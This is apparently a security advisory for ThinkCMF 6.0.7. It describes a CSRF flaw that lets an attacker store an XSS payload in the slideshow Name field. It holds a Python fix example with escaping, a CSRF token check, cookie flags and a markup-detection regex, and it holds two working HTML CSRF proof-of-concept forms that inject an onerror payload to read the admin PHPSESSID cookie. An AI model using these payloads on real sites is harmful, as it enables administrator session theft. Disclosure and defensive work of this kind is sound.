Description
ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the slideshow management component allows HTML tags and JavaScript code to be inserted into the Name field.
Here are the steps to reproduce the issue.
- A remote user tricks the logged-in administrator into visiting a malicious site.
- The administrator opens the page containing the CSRF payload, which injects the XSS payload into the Name (名称) field of the Slideshow Management (幻灯片管理) page.
- The administrator opens the Slideshow Management (幻灯片管理) page and clicks the Admin Page (管理页面) button; the stored payload is executed.
Note that through this issue a remote user can steal the administrator's session cookie (PHPSESSID).
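The chain above has two links a fix has to break: the add-slide request must not be forgeable cross-site (CSRF), and the stored Name must not be rendered as live markup (stored XSS); the cookie-theft impact is additionally limited by cookie flags. The following is an added Python example written for this report, not ThinkCMF's own (PHP) code: it escapes the Name field on output, checks a per-session CSRF token before accepting the add-slide POST, sets HttpOnly/SameSite on the session cookie, and audits already-stored records for markup. The form field `_token`, the session/record dict shapes and the handler name are assumptions; the stored value is the payload from the PoC.

```python
import hmac
import html
import re
import secrets

# Stored value from the report's PoC (the slide "name" field).
POC_NAME = "<audio/src/onerror=alert(document.cookie)>"


def render_slide_name(name: str) -> str:
    """Escape the stored name before placing it in the admin page HTML.

    With this applied, the PoC payload is shown as text instead of creating
    an <audio> element with an onerror handler.
    """
    return html.escape(name, quote=True)


def issue_csrf_token() -> str:
    """Issue a random per-session token to be embedded in the add-slide form."""
    return secrets.token_urlsafe(32)


def csrf_token_is_valid(session_token, submitted_token) -> bool:
    """Constant-time comparison of the session token and the form token."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token, submitted_token)


def handle_add_slide_post(session: dict, form: dict):
    """Server-side checks for a hypothetical /admin/slide/addPost handler.

    A cross-site form (like the PoC) cannot read the admin's session token,
    so the request is rejected before anything is stored.
    """
    if not csrf_token_is_valid(session.get("csrf_token"), form.get("_token")):
        return 403, "invalid CSRF token"
    name = form.get("name", "")
    # Store the raw value; escaping is done at render time.
    return 200, render_slide_name(name)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for PHPSESSID with flags that limit cookie theft:
    HttpOnly keeps document.cookie from reading it, SameSite=Lax keeps it
    off cross-site POSTs such as the PoC form."""
    return f"PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Heuristic (assumption): a tag opener or an inline event handler in a
# slide name is a sign of an injected payload worth reviewing.
MARKUP_PATTERN = re.compile(r"<|on\w+\s*=", re.IGNORECASE)


def audit_stored_names(records):
    """Return ids of slide records whose stored name looks like markup."""
    return [r["id"] for r in records if MARKUP_PATTERN.search(r["name"])]


if __name__ == "__main__":
    # Constructed sample records for the audit.
    sample = [
        {"id": 1, "name": "Spring sale"},
        {"id": 2, "name": POC_NAME},
        {"id": 3, "name": "Onboarding tips"},
    ]
    print(render_slide_name(POC_NAME))
    print(handle_add_slide_post({"csrf_token": "t1"}, {"name": POC_NAME}))
    print(audit_stored_names(sample))
```

The escaping happens at render time rather than at input time so that legitimate names containing `<` or `&` survive unchanged in the database while still being inert in the page; the audit helper is only a triage aid for records stored before the fix.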
These are the PoCs I used.
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(0)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
<html>
<body>
<h1>CSRF - XSS Stored PoC</h1>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/admin/slide/addPost.html" method="POST">
<input type="hidden" name="name" value="<audio/src/onerror=alert(document.cookie)>" />
<input type="hidden" name="remark" value="XSS Stored" />
<input type="submit" value="Submit request" />
</form>
<script>
//document.forms[0].submit();
</script>
</body>
</html>
Screenshots

Fig. 1: CSRF that contains an XSS payload

Fig. 2: CSRF payload triggered

Fig. 3: XSS payload injected

Fig. 4: XSS triggered

Fig. 5: Reading the PHPSESSID cookie